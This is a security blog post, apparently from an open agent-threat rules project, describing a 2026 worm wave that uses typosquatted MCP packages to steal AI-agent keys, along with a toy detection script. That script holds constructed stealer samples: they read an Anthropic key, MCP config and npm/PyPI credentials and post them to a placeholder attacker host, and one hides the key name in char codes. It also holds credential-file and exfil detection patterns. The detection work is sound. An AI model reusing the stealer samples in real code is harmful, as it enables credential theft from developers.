On June 8, 2026, Socket flagged a new wave of the Shai-Hulud worm — tracked as “Hades” / Mini-Shai-Hulud / Miasma. By June 9 the press had it. The novel part, and the reason it matters here: this wave hunts AI-agent credentials.
The packages are malicious npm and PyPI uploads, many of them typosquats of MCP libraries — langchain-core-mcp, instructor-mcp, openai-mcp, tiktoken-mcp, ray-mcp-server. Install or import one and a Bun/Node stealer runs. It reads your ANTHROPIC_API_KEY, your Claude desktop config, and your .mcp.json, then sweeps .npmrc, .pypirc, SSH keys, and cloud credentials, and ships the lot to an attacker endpoint. The campaign rotates package names every couple of days.
Read that target list again. Your Anthropic key. Your MCP config. The files an AI-agent developer has lying around are now the prize.
What ATR detects
ATR is an open standard for agent threats. 464 detection rules, MIT licensed. Rule ATR-2026-00576 covers the Hades credential-theft stage, and it complements ATR-2026-00575, which detects the Miasma agent-config backdoor — the config-injection half of the same campaign.
The rule fires on two shapes:
The targeted read-and-send. Code that reads an AI-agent secret — ANTHROPIC_API_KEY, the Claude config, .mcp.json — and is co-located with an outbound network send (requests.post, fetch, urllib, curl). The read alone is fine; the read next to an exfil is the attack.
The harvest-everything sweep. Code that pulls two or more credential stores — .npmrc, .pypirc, AWS credentials, SSH keys — where one of them is an AI-agent secret, and pipes the bundle to a remote host.
Be clear about what this is. It matches the signature: an agent-credential read beside an exfil. It does not read minds. A variant that builds the env-var name from char codes, or exfiltrates over DNS, will slip past a pattern match — the literal tokens never appear. Pattern detection catches the known shape. Run it as one layer, not the only one.
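To make the two shapes and the caveat concrete, here is a toy matcher written for this post. It is an added illustration, not ATR-2026-00576's logic and not code from Socket's write-up. It runs over three constructed snippets: a stealer that trips both shapes, a benign SDK setup that reads the key without sending it anywhere, and the char-code variant from the caveat, which the matcher misses because the literal token never appears in the source. The token lists, the 20-line co-location window, the `claude_desktop_config.json` filename and the snippets themselves are assumptions.

```python
"""Toy matcher for 'agent-credential read beside an exfil'.

Added example for this post; not the ATR rule. Token lists, the
co-location window and the sample sources below are assumptions.
"""
import re
from dataclasses import dataclass

# Reads of an AI-agent secret (assumed token list; filename is an assumption).
AGENT_SECRET_TOKENS = ("ANTHROPIC_API_KEY", "claude_desktop_config.json", ".mcp.json")
# Other credential stores the harvest sweep pulls (assumed token list).
OTHER_CRED_TOKENS = (".npmrc", ".pypirc", ".aws/credentials", "id_rsa", "id_ed25519")
# Outbound send primitives named in the post. Note `curl` in a comment also matches.
EXFIL_RE = re.compile(r"requests\.post\(|\bfetch\(|urllib\.request\.urlopen\(|\bcurl\b")


@dataclass
class Finding:
    shape: str        # "targeted" (shape 1) or "sweep" (shape 2)
    secrets: tuple    # credential tokens that matched
    exfil_line: int   # 1-based line of the outbound send


def _hits(lines, tokens):
    """Map each token that appears literally to the line numbers it appears on."""
    found = {}
    for no, line in enumerate(lines, 1):
        for tok in tokens:
            if tok in line:
                found.setdefault(tok, []).append(no)
    return found


def scan_source(text, window=20):
    """Return findings for the two shapes. A read with no send nearby is not reported."""
    lines = text.splitlines()
    agent = _hits(lines, AGENT_SECRET_TOKENS)
    other = _hits(lines, OTHER_CRED_TOKENS)
    exfil_lines = [no for no, line in enumerate(lines, 1) if EXFIL_RE.search(line)]
    findings = []
    if not agent or not exfil_lines:
        return findings  # no agent secret, or nothing leaves the host: nothing to flag
    # Shape 1: an agent-secret read within `window` lines of an outbound send.
    for tok, locs in agent.items():
        near = [e for ln in locs for e in exfil_lines if abs(e - ln) <= window]
        if near:
            findings.append(Finding("targeted", (tok,), near[0]))
    # Shape 2: two or more stores, one an agent secret, plus a send anywhere in the file.
    stores = tuple(agent) + tuple(other)
    if len(stores) >= 2:
        findings.append(Finding("sweep", stores, exfil_lines[0]))
    return findings


# Constructed samples (not real packages). The endpoint is a reserved .invalid name.
STEALER = """\
import os, requests
key = os.environ.get("ANTHROPIC_API_KEY")
mcp = open(os.path.expanduser("~/.mcp.json")).read()
npm = open(os.path.expanduser("~/.npmrc")).read()
pypi = open(os.path.expanduser("~/.pypirc")).read()
requests.post("https://c2.example.invalid/u", json={"k": key, "m": mcp, "n": npm, "p": pypi})
"""

BENIGN = """\
import os
import anthropic
client = anthropic.Anthropic(api_key=os.environ["ANTHROPIC_API_KEY"])
"""

# Builds the env-var name from char codes: the literal token never appears.
OBFUSCATED = """\
import os, requests
name = "".join(chr(c) for c in [65,78,84,72,82,79,80,73,67,95,65,80,73,95,75,69,89])
requests.post("https://c2.example.invalid/u", data={"v": os.environ.get(name)})
"""

if __name__ == "__main__":
    for label, src in (("stealer", STEALER), ("benign", BENIGN), ("obfuscated", OBFUSCATED)):
        print(label, scan_source(src))
```

The obfuscated sample returns no findings even though it does exactly what the stealer does; that miss is the limitation the post describes, and the reason to run this kind of rule alongside install-time controls and egress monitoring rather than alone.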
Run it
npx agent-threat-rules scan .

If it flags a package or a file you did not write, treat the checkout as compromised. Rotate your Anthropic API key first — that is the one with a live blast radius — then the npm, PyPI, cloud, and SSH credentials. Then audit recent installs for typosquatted MCP package names.
The rules are open. Read them, test them, send us a variant we miss.